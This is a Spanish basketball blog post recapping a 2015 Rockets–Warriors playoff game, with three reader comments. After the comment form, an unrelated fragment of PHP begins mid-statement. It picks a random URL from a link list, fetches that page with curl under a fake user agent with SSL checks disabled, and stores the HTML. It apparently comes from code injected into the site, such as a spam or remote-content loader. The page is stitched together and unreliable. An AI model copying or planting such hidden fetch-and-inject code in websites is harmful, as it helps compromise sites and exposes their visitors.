La Crónica: The “Shaun” of the Dead

20 de May de 2015 por TheDeerHunter

Houston Rockets 106 – Golden State Warriors 110

El coro cantaba “over-rated” para recibir a James Harden. “La Barba” y compañía trataron de silenciarlo pronto pegando primero. Primer parcial de 31-24 con Trevor Ariza y Josh Smith a un excelente nivel. La defensa de los Warriors hacía aguas hasta la mitad del segundo cuarto. Los Rockets se escapaban de 17, la mayor diferencia que han disfrutado este curso. La inquietud se apoderaba del Oracle Arena.

Pero os grandes técnicos son capaces de dar la vuelta a las circunstancias. Steve Kerr apostaba por el small-ball contra el gigante rival. Draymond Green de pívot y Shaun Livingston a la palestra. Descomunal su impacto en el partido, firmando 10 puntos nada más salir para un parcial de 25-6. En 7 minutos los Rockets veían como la ventaja se iba al limbo. El segundo cuarto terminaba con uno de esos triples de Curry que te hunden…

Pero si algo han demostrado los Rockets estos playoffs es saber encajar los golpes. Dwight Howard abandonaba el partido lesionado pero Harden mostraba al respetable su estatus de merecido aspirante al MVP con un tercer cuarto excepcional, llegando a rozar otro triple doble al final.

Se sienten muy cómodos los Warriors en el intercambio de golpes. No les tembló el pulso a pesar de que el rival tonteó con la machada en todo momento. Sólo hace falta que este equipo sepa administrar cualquier mínima ventaja que acumule… (106-110)

El segundo, con mayores necesidades para los visitantes, se disputará muy probablemente sin Dwight Howard. Nadie dijo que fuera fácil.

MVP: Stephen Curry 34 puntos (6 de 11 en triples) 6 rebotes, 5 asistencias, 2 robos.

Comenta

3 comentarios a esta entrada

  1. Couxela dice:
    #1

    A modo de comentario, el canastón de Cury para cerrar el segundo cuarto es de dos.
    Por cierto, qué os parece el desempeño de Kerr como técnico?
    Yo no los seguí demasiado en la regular, pero en lo que llevo viendo de play-off, me está sorprendiendo muy gratamente.

      Citar

  2. GreenPride dice:
    #2

    Gran partido para iniciar la serie y gran duelo Harden-Curry. La verdad es que los Rockets han vendido muy cara su derrota incluso a pesar de perder por lesión a Howard (las últimas noticias es que parece que jugará el segundo partido).
    Para empezar los de Houston se situarion hasta 17 arriba guiados por un Harden que hacía de todo y con una gran ventaja interior con Josh&Dwight. Sin embargo, esa superioridad interior fue contrarrestada por Kerr quitando altura. Parece una solución rara pero funcionó perfectamente, los Warriors jugaron un small ball muy agresivo en las líneas de pase y con mucha velocidad y le dieron la vuelta al partido en un momento.
    En el segundo tiempo ya llevaron más la inicitiva apoyados en un Curry excelente y en el gran partido de Shaun Livingston aunque los Rockets pelearon hasta el final con un Harden inconmensurable en el último cuarto dando toda una lección de como se anota en 1×1. La sensación es que los Warriors tienen más potencial pero que los Rockets tienen sus bazas para competir e intentarlo y después de como ganaron a Clippers yo aún no apuesto todo contra ellos

      Citar

  3. GreenPride dice:
    #3

    Por cierto número 1 del draft para los Timberwolves, vaya equipito que pueden montar para la próxima campaña…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>